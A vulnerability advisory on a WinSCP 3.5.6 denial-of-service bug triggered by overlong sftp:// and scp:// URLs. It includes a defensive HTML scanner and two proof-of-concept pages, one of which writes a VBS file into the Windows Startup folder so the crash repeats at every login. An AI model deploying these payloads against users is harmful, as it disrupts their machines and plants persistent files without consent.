Package: WinSCP
Auth: http://winscp.sourceforge.net
Version(s): 3.5.6 (prior versions may also be vulnerable)
Vulnerability: Denial of Service

What’s WinSCP:
“WinSCP is an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer.”

Vulnerability Description:
A default installation of WinSCP provides the user with functionality to handle sftp:// and scp:// addresses. The vulnerability exists due to the way the application handles long URLs. A malformed scp:// or sftp:// address embedded in an HTML tag causes the WinSCP application to exhaust CPU and memory resources. The attacker would need to convince the user to visit a web site the attacker controls or to open an HTML e-mail the attacker has prepared. During the denial of service, WinSCP will not display any GUI.

Goal:
An attacker may use this flaw to prevent the users of the attacked host from working properly.

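A defensive check for the behaviour described above, added here as an example and not part of the original advisory: it scans HTML (for instance at a mail or web gateway) for scp:// and sftp:// URLs longer than a limit. The function and class names, the 256-character limit and the sample page are assumptions; the advisory does not state the length that triggers the hang.

```python
import re
from html.parser import HTMLParser

# Assumed limit: the advisory gives no exact trigger length, so tune this value.
MAX_URL_LEN = 256
URL_RE = re.compile(r"(?i)\b(?:scp|sftp)://[^\s\"'<>\\]+")


class HandlerUrlScanner(HTMLParser):
    """Collect scp:// and sftp:// URLs from attribute values and text/script data."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []  # (location, url_length, oversized)

    def _scan(self, where, text):
        for match in URL_RE.finditer(text):
            length = len(match.group(0))
            self.hits.append((where, length, length > MAX_URL_LEN))

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value:
                # Browsers drop tabs and newlines inside URL attributes, so
                # remove them before measuring to defeat line-wrapped padding.
                self._scan(f"<{tag} {name}>", re.sub(r"[\t\r\n]", "", value))

    def handle_data(self, data):
        self._scan("text/script", data)


def oversized_handler_urls(html):
    """Return the hits whose URL exceeds MAX_URL_LEN."""
    scanner = HandlerUrlScanner()
    scanner.feed(html)
    scanner.close()
    return [hit for hit in scanner.hits if hit[2]]


# Constructed sample page: one ordinary link and one padded far past the limit.
SAMPLE_HTML = (
    '<html><body>'
    '<a href="sftp://files.example.invalid/report.txt">short link</a>'
    '<a href="sftp://files.example.invalid/' + "x" * 1000 + '">padded link</a>'
    '</body></html>'
)

if __name__ == "__main__":
    for where, length, _ in oversized_handler_urls(SAMPLE_HTML):
        print(f"oversized scp/sftp URL in {where}: {length} characters")
```
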
Practical Examples:

------ WinSCP_DoS1.html --------
WinSCP DoS
URL=sftp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
----------------------------------

-------- WinSCP_DoS2.html -------
WinSCP DoS
<script language="JScript">
var WshShell = new ActiveXObject("WScript.Shell");
strSU = WshShell.SpecialFolders("StartUp");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);
vibas.WriteLine("Dim shell");
vibas.WriteLine("Dim quote");
vibas.WriteLine("Dim DoS");
vibas.WriteLine("Dim param");
vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
vibas.WriteLine("quote = Chr(34)");
vibas.WriteLine("pgm = \"explorer\"");
vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");
vibas.Close();
</script>
----------------------------------

Credits:
-- Luca Ercoli
Seeweb http://www.seeweb.com